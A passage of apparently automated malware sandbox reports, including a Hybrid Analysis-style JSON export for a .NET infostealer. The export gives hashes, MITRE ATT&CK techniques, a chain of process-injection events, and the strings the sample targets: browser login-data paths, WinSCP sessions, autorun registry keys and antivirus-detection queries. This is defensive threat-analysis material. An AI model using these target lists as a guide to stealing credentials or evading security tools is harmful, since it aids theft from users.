\"C:\\0020002.exe\" (Handle: 68)\n \"lnvjpll.exe\" wrote 4 bytes to a remote process \"C:\\0020002.exe\" (Handle: 68)\n \"0020002.exe\" wrote 32 bytes to a remote process \"C:\\802862.exe\" (Handle: 116)\n \"0020002.exe\" wrote 52 bytes to a remote process \"C:\\802862.exe\" (Handle: 116)\n \"0020002.exe\" wrote 4 bytes to a remote process \"C:\\802862.exe\" (Handle: 116)\n \"802862.exe\" wrote 32 bytes to a remote process \"C:\\824686.exe\" (Handle: 116)\n \"802862.exe\" wrote 52 bytes to a remote process \"C:\\824686.exe\" (Handle: 116)\n \"802862.exe\" wrote 4 bytes to a remote process \"C:\\824686.exe\" (Handle: 116)\n \"824686.exe\" wrote 32 bytes to a remote process \"C:\\0228060.exe\" (Handle: 116)\n \"824686.exe\" wrote 52 bytes to a remote process \"C:\\0228060.exe\" (Handle: 116)\n \"824686.exe\" wrote 4 bytes to a remote process \"C:\\0228060.exe\" (Handle: 116)\n \"0228060.exe\" wrote 32 bytes to a remote process \"C:\\4404242.exe\" (Handle: 68)\n \"0228060.exe\" wrote 52 bytes to a remote process \"C:\\4404242.exe\" (Handle: 68)\n \"0228060.exe\" wrote 4 bytes to a remote process \"C:\\4404242.exe\" (Handle: 68)\n \"4404242.exe\" wrote 32 bytes to a remote process \"C:\\dvrdf.exe\" (Handle: 68)\n \"4404242.exe\" wrote 52 bytes to a remote process \"C:\\dvrdf.exe\" (Handle: 68)\n \"4404242.exe\" wrote 4 bytes to a remote process \"C:\\dvrdf.exe\" (Handle: 68)\n \"dvrdf.exe\" wrote 32 bytes to a remote process \"C:\\nrdphjv.exe\" (Handle: 116)\n \"dvrdf.exe\" wrote 52 bytes to a remote process \"C:\\nrdphjv.exe\" (Handle: 116)\n \"dvrdf.exe\" wrote 4 bytes to a remote process \"C:\\nrdphjv.exe\" (Handle: 116)\n \"nrdphjv.exe\" wrote 32 bytes to a remote process \"C:\\rpbpdxh.exe\" (Handle: 68)\n \"nrdphjv.exe\" wrote 52 bytes to a remote process \"C:\\rpbpdxh.exe\" (Handle: 68)\n \"nrdphjv.exe\" wrote 4 bytes to a remote process \"C:\\rpbpdxh.exe\" (Handle: 68)\n \"rpbpdxh.exe\" wrote 32 bytes to a remote process \"C:\\408802.exe\" (Handle: 116)\n \"rpbpdxh.exe\" wrote 52 bytes to a remote process \"C:\\408802.exe\" (Handle: 116)\n \"rpbpdxh.exe\" wrote 4 bytes to a remote process \"C:\\408802.exe\" (Handle: 116)\n \"408802.exe\" wrote 32 bytes to a remote process \"C:\\6644862.exe\" (Handle: 68)\n \"408802.exe\" wrote 52 bytes to a remote process \"C:\\6644862.exe\" (Handle: 68)\n \"408802.exe\" wrote 4 bytes to a remote process \"C:\\6644862.exe\" (Handle: 68)\n \"6644862.exe\" wrote 32 bytes to a remote process \"C:\\848862.exe\" (Handle: 116)\n \"6644862.exe\" wrote 52 bytes to a remote process \"C:\\848862.exe\" (Handle: 116)\n \"6644862.exe\" wrote 4 bytes to a remote process \"C:\\848862.exe\" (Handle: 116)\n \"848862.exe\" wrote 32 bytes to a remote process \"C:\\22202.exe\" (Handle: 68)\n \"848862.exe\" wrote 52 bytes to a remote process \"C:\\22202.exe\" (Handle: 68)\n \"848862.exe\" wrote 4 bytes to a remote process \"C:\\22202.exe\" (Handle: 68)\n \"22202.exe\" wrote 32 bytes to a remote process \"C:\\lvlfrln.exe\" (Handle: 68)\n \"22202.exe\" wrote 52 bytes to a remote process \"C:\\lvlfrln.exe\" (Handle: 68)\n \"22202.exe\" wrote 4 bytes to a remote process \"C:\\lvlfrln.exe\" (Handle: 68)\n \"lvlfrln.exe\" wrote 32 bytes to a remote process \"C:\\vrdnrx.exe\" (Handle: 68)\n \"lvlfrln.exe\" wrote 52 bytes to a remote process \"C:\\vrdnrx.exe\" (Handle: 68)\n \"lvlfrln.exe\" wrote 4 bytes to a remote process \"C:\\vrdnrx.exe\" (Handle: 68)\n \"vrdnrx.exe\" wrote 32 bytes to a remote process \"C:\\6248060.exe\" (Handle: 104)\n \"vrdnrx.exe\" wrote 52 bytes to a remote process \"C:\\6248060.exe\" (Handle: 104)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2
https://hybrid-analysis.com/sample/70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2
Hybrid Analysis - Infostealers
{"size": 3266048, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2", "sha256": "70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2", "av_detect": 89, "vx_family": "Trojan.Agent", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 102, "extracted_files": [{"name": "Client.exe", "file_size": 3266048, "sha256": "70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe (PID: 5644)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005644", "name": "70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe", "normalized_path": "C:\\70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe", "sha256": "70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Network Sniffing", "attck_id": "T1040", "attck_id_wiki": "https://attack.mitre.org/techniques/T1040", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials In Files", "attck_id": "T1552.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552/001", "malicious_identifiers_count": 1, "parent": {"technique": "Unsecured Credentials", "attck_id": "T1552", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552"}}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Network Sniffing", "attck_id": "T1040", "attck_id_wiki": "https://attack.mitre.org/techniques/T1040", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\n \"SOFTWARE\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions\" in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\n \"BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data\" in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\n \"BraveSoftware\\Brave-Browser\\User Data\\Local State\" in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\n \"Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2\" in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\n \"Opera Software\\Opera GX Stable\\Login Data\" in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\n \"Opera Software\\Opera GX Stable\\Local State\" in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\n \"Opera Software\\Opera Stable\\Login Data\" in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\n \"Opera Software\\Opera Stable\\Local State\" in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\n \"SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\n \"SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\n \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" in Source: 6000042-_~_\n \"SOFTWARE\\\\\\\\Martin Prikryl\\\\\\\\WinSCP 2\\\\\\\\Sessions\" in Source: 600007f-_~ReadAccounts\n \"BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default\\\\Login Data\" in Source: 6000087-_~ReadAccounts\n \"BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Local State\" in Source: 6000087-_~ReadAccounts\n \"Software\\\\Microsoft\\\\Internet Explorer\\\\IntelliForms\\\\Storage2\" in Source: 60000d7-_~_\n \"Opera Software\\\\Opera GX Stable\\\\Login Data\" in Source: 600011c-_~ReadAccounts\n \"Opera Software\\\\Opera GX Stable\\\\Local State\" in Source: 600011c-_~ReadAccounts\n \"Opera Software\\\\Opera Stable\\\\Login Data\" in Source: 600011f-_~ReadAccounts\n \"Opera Software\\\\Opera Stable\\\\Local State\" in Source: 600011f-_~ReadAccounts\n \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" in Source: 60001c8-_~_\n \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\" in Source: 60001c8-_~_\n \"SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" in Source: 60001c8-_~_\n \"SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\" in Source: 60001c8-_~_\n \"Read?HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\" in Source: 00000000-00005644.00000003.73672.005F0000.00000004.mdmp\n \"Read3HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\.NETFramework\" in Source: 00000000-00005644.00000003.73672.005F0000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-135", "type": 2, "relevance": 1, "name": "Found well known domains (string)", "description": "\"Are you mixing protobuf-net and protobuf-csharp-port? See https://stackoverflow.com/q/11564914/23354; type:\" (Indicator: \"stackoverflow.com\")\n \"; please see https://stackoverflow.com/q/14436606/23354\" (Indicator: \"stackoverflow.com\")\n \"Invalid wire-type; this usually means you have over-written a file without truncating or setting the length; see https://stackoverflow.com/q/2152978/23354\" (Indicator: \"stackoverflow.com\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"4,3140,,CreateProcessW,kerne\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005644.00000003.73672.00220000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63280000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74980000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\c774d406-1616-403d-b459-8701fe187966\"\n \"Local\\c774d406-1616-403d-b459-8701fe187966\"\n \"Global\\CLR_PerfMon_WrapMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"CreateDC\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to API (Indicator: \"DeleteDC\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to API (Indicator: \"CryptHashData\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found reference to API (Indicator: \"GetProcessById\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-8", "type": 2, "relevance": 2, "name": "Possibly checks for the presence of an Antivirus engine", "description": "\"Antivirus\" (Indicator: \"antivirus\") in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2", "origin": "File/Memory", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-605", "type": 2, "relevance": 1, "name": "May execute SQL queries", "description": "\"SELECT Caption FROM Win32_OperatingSystem\" (Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2, Indicator: \"select caption from win32_operatingsystem\")\n \"SELECT * FROM Win32_BIOS\" (Source: 6000239-_~_, Indicator: \"select * from win32_bios\")\n \"SELECT * FROM Win32_BaseBoard\" (Source: 600023a-_~_, Indicator: \"select * from win32_baseboard\")\n \"SELECT * FROM Win32_Processor\" (Source: 600023b-_~_, Indicator: \"select * from win32_processor\")\n \"Select * From Win32_ComputerSystem\" (Source: 600023c-_~_, Indicator: \"select * from win32_computersystem\")\n \"SELECT * FROM Win32_DisplayConfiguration\" (Source: 600023d-_~_, Indicator: \"select * from win32_displayconfiguration\")\n \"SELECT * FROM Win32_OperatingSystem WHERE Primary='true'\" (Source: 6000269-_~, Indicator: \"select * from win32_operatingsystem where primary='true'\")\n \"SELECT * FROM AntivirusProduct\" (Source: 600026b-_~_, Indicator: \"select * from antivirusproduct\")\n \"SELECT * FROM FirewallProduct\" (Source: 600026c-_~_, Indicator: \"select * from firewallproduct\")", "origin": "File/Memory", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-16", "type": 2, "relevance": 2, "name": "Contains SQL queries", "description": "\"SELECT Caption FROM Win32_OperatingSystem\" (Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2, Indicator: \"select caption from win32_operatingsystem\")\n \"SELECT * FROM Win32_BIOS\" (Source: 6000239-_~_, Indicator: \"select * from win32_bios\")\n \"SELECT * FROM Win32_BaseBoard\" (Source: 600023a-_~_, Indicator: \"select * from win32_baseboard\")\n \"SELECT * FROM Win32_Processor\" (Source: 600023b-_~_, Indicator: \"select * from win32_processor\")\n \"Select * From Win32_ComputerSystem\" (Source: 600023c-_~_, Indicator: \"select * from win32_computersystem\")\n \"SELECT * FROM Win32_DisplayConfiguration\" (Source: 600023d-_~_, Indicator: \"select * from win32_displayconfiguration\")\n \"SELECT * FROM Win32_OperatingSystem WHERE Primary='true'\" (Source: 